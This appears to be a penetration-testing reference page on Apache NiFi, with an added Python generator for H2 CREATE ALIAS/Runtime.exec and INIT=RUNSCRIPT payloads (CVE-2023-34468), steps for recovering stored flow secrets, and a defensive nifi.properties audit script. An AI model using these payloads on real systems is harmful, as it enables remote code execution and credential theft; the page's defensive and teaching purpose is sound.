Apache NiFi
aka NiFi
Java dataflow platform with a web UI on 8080 (plaintext HTTP, the pre-1.14 default, on which NiFi enforces no authentication at all) or 8443 (HTTPS, the 1.14+ default with generated single-user credentials). Processors such as ExecuteScript and ExecuteProcess, and a DBCPConnectionPool pointed at an H2 JDBC URL, give straightforward code execution to anyone who can edit the flow.
Ports
| Port | Proto | Notes |
|---|---|---|
| 8080 | tcp | NiFi web UI (HTTP, pre-1.14 default) |
| 8443 | tcp | NiFi web UI (HTTPS, 1.14+ default) |
Fingerprint
- NiFi canvas UI at /nifi
- Version in the About dialog of the global menu, or from the REST API: /nifi-api/flow/about returns it, and /nifi-api/system-diagnostics returns it plus JVM and disk details (needs read access to /system)
Key files
| Path | Holds | Sensitive |
|---|---|---|
| conf/nifi.properties | ports, TLS keystore settings, login provider and authorizer, and nifi.sensitive.props.key (the key that protects secrets stored in the flow) | sensitive |
| conf/login-identity-providers.xml | single-user username and bcrypt password hash | sensitive |
| conf/flow.xml.gz (flow.json.gz on 1.16+) | the flow definition; sensitive property values are stored encrypted with the sensitive-props key, so flow file plus nifi.properties yields them | sensitive |
Default / weak creds
1.14+ generates a random username and password on first start and writes them to logs/nifi-app.log ("Generated Username" / "Generated Password"); reset them with bin/nifi.sh set-single-user-credentials <user> <pass>. Builds before 1.14 shipped with plaintext HTTP on 8080 and no authentication at all.
Service users
nifi
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2023-34468 | RCE: an authenticated user allowed to configure a DBCPConnectionPool or HikariCPConnectionPool controller service sets an H2 JDBC URL, and H2 executes attacker-supplied code. Affects 0.0.2 through 1.21.0; 1.22.0 rejects H2 URLs. |
Exploitation primitives
- ExecuteScript / ExecuteProcess processors run attacker code as the OS user NiFi runs as (normally nifi)
- ExecuteSQL against an H2 database: CREATE ALIAS ... AS $$ <Java source> $$ makes H2 compile a Java method, so a body that calls Runtime.exec runs shell commands on a later CALL. Before 1.22 the H2 JDBC URL itself could carry an INIT= statement, which H2 runs as soon as the connection pool opens a connection, no processor required.
- Stored credentials in flow.xml.gz and parameter contexts: sensitive values are encrypted with nifi.sensitive.props.key from nifi.properties, so anyone with the flow file and that key can recover every stored password
Overview
NiFi builds data pipelines from processors on a web canvas. Several processors are effectively code-execution by design, so admin (or open) access to the UI is usually a shell as the nifi user.
Enumeration
Read the version once authenticated. On 1.14+ the REST API takes a bearer token obtained from /nifi-api/access/token with the single-user (or LDAP) credentials; /nifi-api/flow/about also returns the version:
TOKEN=$(curl -sk -X POST https://<TARGET>:8443/nifi-api/access/token -d 'username=<USER>&password=<PASS>')
curl -sk -H "Authorization: Bearer $TOKEN" https://<TARGET>:8443/nifi-api/system-diagnostics
RCE paths
- Add an ExecuteProcess/ExecuteScript processor that runs your command.
- Or abuse an H2 ExecuteSQL flow: CREATE ALIAS x AS $$ ... Runtime.exec ... $$;
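The H2 path spelled out, as an added example that is not from the page or from the NiFi or H2 projects. Python is used only to assemble and quote the SQL; the CREATE ALIAS / CALL syntax and the INIT=RUNSCRIPT URL option are H2's own. The alias name SHELLEXEC, the in-memory database name mem:x and the script path are illustrative assumptions. H2 compiles the Java body when the alias is created, so a Java compiler must be reachable from the NiFi JVM (a JDK runtime; a bare JRE fails at that step).

```python
"""Added example (not NiFi or H2 project code): build the H2 statements for the
ExecuteSQL path and the INIT= JDBC URL form. SHELLEXEC, mem:x and the script
path are illustrative assumptions."""

from typing import List

# Java source that H2 compiles when the alias is created. It runs the command
# and returns its stdout, so the output comes back as the query result.
# The regex \A makes Scanner read the whole stream as one token.
_ALIAS_JAVA = r'''String shellexec(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(
        Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}'''

ALIAS_NAME = "SHELLEXEC"  # illustrative name, not anything H2 defines


def sql_quote(value: str) -> str:
    """Turn a string into an SQL literal; single quotes are doubled."""
    return "'" + value.replace("'", "''") + "'"


def h2_alias_statements(cmd: str, alias: str = ALIAS_NAME) -> List[str]:
    """The two statements: define the alias (DDL), then call it (query).

    Kept separate because ExecuteSQL expects a result set; if a build rejects
    the DDL there, send statement 0 through PutSQL and statement 1 through
    ExecuteSQL. Each statement ends with ';' so they concatenate into a script.
    """
    return [
        f"CREATE ALIAS IF NOT EXISTS {alias} AS $${_ALIAS_JAVA}$$;",
        f"CALL {alias}({sql_quote(cmd)});",
    ]


def h2_alias_sql(cmd: str, alias: str = ALIAS_NAME) -> str:
    """Both statements as one script, which is what RUNSCRIPT consumes."""
    return "\n".join(h2_alias_statements(cmd, alias))


def h2_init_url(script_path: str, db: str = "mem:x") -> str:
    """JDBC URL that makes H2 run a script on every new connection.

    This is the vector CVE-2023-34468 closed: DBCPConnectionPool and
    HikariCPConnectionPool accepted such a URL, so enabling the controller
    service was enough, with no processor needed. The script must be readable
    by the nifi user on the NiFi host (assumption: you can place it there).
    """
    return f"jdbc:h2:{db};INIT=RUNSCRIPT FROM {sql_quote(script_path)}"


if __name__ == "__main__":
    print(h2_alias_sql("id"))
    print(h2_init_url("/tmp/alias.sql"))
```

Feed the output of h2_alias_sql into the ExecuteSQL (or PutSQL plus ExecuteSQL) flow described above; the output of h2_init_url goes into the Database Connection URL of a DBCPConnectionPool on a build older than 1.22.0, with the script written to the path it names.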
Hardening
Run 1.22.0 or later (H2 JDBC URLs are rejected in DBCPConnectionPool and HikariCPConnectionPool), and serve the UI over HTTPS only with nifi.web.http.port left blank, since the HTTP listener enforces neither authentication nor policies. Replace the single-user authorizer with a managed authorizer and grant the "view the component" and "modify the component" policies per process group, so only trusted identities can add or change processors and controller services. Treat conf/ as secret material: nifi.sensitive.props.key and login-identity-providers.xml together with the flow file are enough to recover every stored credential.
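A check a defender would run over conf/nifi.properties for the settings above, as an added example that is not NiFi project code. The property keys are the real nifi.properties names; the three sample files (a pre-1.14 install left on defaults, a 1.14+ single-user default, and a hardened configuration) and the key value in them are constructed here and come from no real host:

```python
"""Added example (not NiFi project code): flag the nifi.properties settings
behind the attack paths on this page. Keys are real nifi.properties names;
the sample files below are constructed for illustration."""

from typing import Dict, List


def parse_properties(text: str) -> Dict[str, str]:
    """Minimal Java .properties reader: key=value lines, '#'/'!' comments,
    no line continuations (nifi.properties does not use them)."""
    props: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def audit_nifi_properties(text: str) -> List[str]:
    """One finding per weak setting; an empty list means nothing was flagged."""
    p = parse_properties(text)
    get = lambda k: p.get(k, "")
    findings: List[str] = []
    http = get("nifi.web.http.port")
    if http:
        findings.append(f"plaintext HTTP listener on {http}: no TLS, and NiFi enforces "
                        "no authentication or policies on the HTTP port")
    if not get("nifi.web.https.port"):
        findings.append("no HTTPS listener (nifi.web.https.port empty)")
    if get("nifi.security.allow.anonymous.authentication").lower() == "true":
        findings.append("anonymous authentication enabled")
    if get("nifi.security.user.authorizer") == "single-user-authorizer":
        findings.append("single-user-authorizer: every authenticated identity is a full "
                        "admin, so no least-privilege policies exist")
    if not get("nifi.sensitive.props.key"):
        findings.append("empty nifi.sensitive.props.key: pre-1.14 falls back to a built-in "
                        "default, so flow.xml.gz secrets decrypt with public knowledge")
    alg = get("nifi.sensitive.props.algorithm")
    if alg.upper().startswith("PBEWITH"):
        findings.append(f"legacy flow encryption algorithm {alg}; migrate to "
                        "NIFI_PBKDF2_AES_GCM_256 with the toolkit's encrypt-config")
    return findings


# Constructed sample: pre-1.14 install left on its defaults.
LEGACY_OPEN = """\
nifi.web.http.port=8080
nifi.web.https.port=
nifi.security.user.login.identity.provider=
nifi.security.user.authorizer=managed-authorizer
nifi.security.allow.anonymous.authentication=false
nifi.sensitive.props.key=
nifi.sensitive.props.algorithm=PBEWITHMD5AND256BITAES-CBC-OPENSSL
"""

# Constructed sample: 1.14+ defaults with the generated single-user account.
# The key value is made up for the example.
SINGLE_USER_DEFAULT = """\
nifi.web.http.port=
nifi.web.https.port=8443
nifi.security.user.login.identity.provider=single-user-provider
nifi.security.user.authorizer=single-user-authorizer
nifi.security.allow.anonymous.authentication=false
nifi.sensitive.props.key=6d3c1f9b0a8e4c7d5b2a9f0e1c3d4b5a
nifi.sensitive.props.algorithm=NIFI_PBKDF2_AES_GCM_256
"""

# Constructed sample: hardened. TLS only, external login provider, managed
# authorizer with per-user policies, managed key, current algorithm.
HARDENED = """\
nifi.web.http.port=
nifi.web.https.port=8443
nifi.security.user.login.identity.provider=ldap-provider
nifi.security.user.authorizer=managed-authorizer
nifi.security.allow.anonymous.authentication=false
nifi.sensitive.props.key=6d3c1f9b0a8e4c7d5b2a9f0e1c3d4b5a
nifi.sensitive.props.algorithm=NIFI_PBKDF2_AES_GCM_256
"""

if __name__ == "__main__":
    for name, text in (("legacy", LEGACY_OPEN), ("single-user", SINGLE_USER_DEFAULT),
                       ("hardened", HARDENED)):
        print(name, audit_nifi_properties(text))
```

Point it at the live file with audit_nifi_properties(open("conf/nifi.properties").read()); the legacy sample produces four findings, the 1.14+ default only the single-user one, the hardened sample none.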